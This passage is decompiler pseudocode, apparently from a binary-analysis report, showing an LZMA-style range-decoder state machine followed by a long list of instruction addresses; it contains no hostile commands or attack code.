													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														__ebx = __edx + 1;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00000000
                                                                      0x00406c9d
                                                                      0x00406c9d
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00406ce1
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406ceb
                                                                      0x00406cf0
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x00407160
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00407171
                                                                      0x00407178
                                                                      0x0040717c
                                                                      0x0040717c
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406826
                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9b
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406ba8
                                                                      0x00406bab
                                                                      0x00406bae
                                                                      0x00406bb1
                                                                      0x00406bb4
                                                                      0x00406bb6
                                                                      0x00406bbd
                                                                      0x00406bbe
                                                                      0x00406bc0
                                                                      0x00406bc3
                                                                      0x00406bc6
